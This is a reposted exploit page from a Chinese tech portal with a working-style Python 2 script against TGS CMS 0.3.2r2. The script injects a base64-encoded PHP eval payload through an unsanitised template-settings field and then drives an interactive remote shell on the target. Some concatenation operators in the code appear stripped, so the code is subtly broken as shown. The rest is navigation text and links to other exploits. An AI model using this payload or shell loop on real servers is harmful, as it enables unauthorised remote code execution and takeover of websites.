allcnewsBLOGNEWSBLOGASKBLOGBLOGZSK全部技术问答问答技术问答it问答代码软件新闻开发博客电脑/网络手机/数码笔记本电脑互联网操作系统软件硬件编程开发360产品资源分享电脑知识文档中心IT全部全部分类 全部分类技术牛文全部分类教程最新 网页制作cms教程平面设计媒体动画操作系统网站运营网络安全服务器教程数据库工具网络安全软件教学vbscript正则表达式javascript批处理更多»编程更新教程更新游戏更新allitnewsJava 新闻网络医疗信息化安全创业站长电商科技访谈域名会议专栏创业动态融资创投创业学院 / 产品经理创业公司人物访谈营销 开发数据库服务器系统虚拟化云计算 嵌入式移动开发作业作业1常见软件all电脑网络手机数码生活游戏体育运动明星影音休闲爱好文化艺术社会民生教育科学医疗健康金融管理情感社交地区其他电脑互联网软件硬件编程开发360相关产品手机平板其他电子产品摄影器材360硬件通讯智能设备购物时尚生活常识美容塑身服装服饰出行旅游交通汽车购房置业家居装修美食烹饪单机电脑游戏网页游戏电视游戏桌游棋牌游戏手机游戏小游戏掌机游戏客户端游戏集体游戏其他游戏体育赛事篮球足球其他运动球类运动赛车健身运动运动用品影视娱乐人物音乐动漫摄影摄像收藏宠物幽默搞笑起名花鸟鱼虫茶艺彩票星座占卜书画美术舞蹈小说图书器乐声乐小品相声戏剧戏曲手工艺品历史话题时事政治就业职场军事国防节日风俗法律法规宗教礼仪礼节自然灾害360维权社会人物升学入学人文社科外语资格考试公务员留学出国家庭教育学习方法语文物理生物工程学农业数学化学健康知识心理健康孕育早教内科外科妇产科儿科皮肤科五官科男科整形中医药品传染科其他疾病医院两性肿瘤科创业投资企业管理财务税务银行股票金融理财基金债券保险贸易商务文书国民经济爱情婚姻家庭烦恼北京上海重庆天津黑龙江吉林辽宁河北内蒙古山西陕西宁夏甘肃青海新疆西藏四川贵州云南河南湖北湖南山东江苏浙江安徽江西福建广东广西海南香港澳门台湾海外地区

TGS CMS 0.3.2r2 Remote Code Execution Exploit

日期:2013/11/22 18:52:00 来源:本网整理
点评:# TGS CMS Remote Code Execution Exploit # by 0in # from Dark-Coders Group! # www.dark-coders.pl # Contact: 0in(dot)email[at]gmail(dot)com # Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke # Dork:NULL - because "You c < id="con_ad1"> < id="con_ad8"> # TGS CMS Remote Code Execution Exploit
# by 0in
# from Dark-Coders Group!
# www.dark-coders.pl
# Contact: 0in(dot)email[at]gmail(dot)com
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot
# Let's analyze the vuln:
# We've got the: /cms/admin/admin.template_engine.php
# first line:"<?"
# next 2-22 lines - comments
# 23: if ($_GET['option'] == "set_template") {
# 24: $filename = "../index.php";
# 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {
# From 50 line to 88 we have definition of file content
# 50: $content = '<?php // here programmer define the file to save in "../index.php"
# but...
# he.. don't think xD
# 77:$tgs_template->template_dir = "'.$_POST['template_dir'].'";
# 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'";
# 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";
# 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
# And.. boom!
# 89: if (@fwrite($handle,$content)) {
# Just simply exploit for fun:
import httplib
import urllib
print "TGS CMS Remote Code Execution Exploit"
print "by 0in From Dark-Coders Group"
print "www.dark-coders.pl"
print 'Enter target:'
target=raw_input()
print 'Enter path:'
path=raw_input()
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"
exploit=httplib.HTTPConnection(target ':80')
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}
data=urllib.urlencode({'right_delimiter':inject})
exploit.request("POST",path "/cms/admin/admin.template_engine.php?option=set_template",data,headers)
print exploit.getresponse().read()
while(1):
cmd=raw_input("[shell@" target "]#")
if(cmd=='exit'):
quit()
shell=httplib.HTTPConnection(target ':80')
shell.request("GET",path "/cms/index.php?zuo=" cmd)
print shell.getresponse().read()

  • 本文相关:
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
  • LoveCMS 1.6.2 Final Remote Code Execution Exploit
  • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
  • moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
  • Joomla Component EZ Store Remote Blind SQL Injection Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
  • IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
  • Ultra Office ActiveX Control Remote Buffer Overflow Exploit
  • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
  • 免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2017 www.zgxue.com All Rights Reserved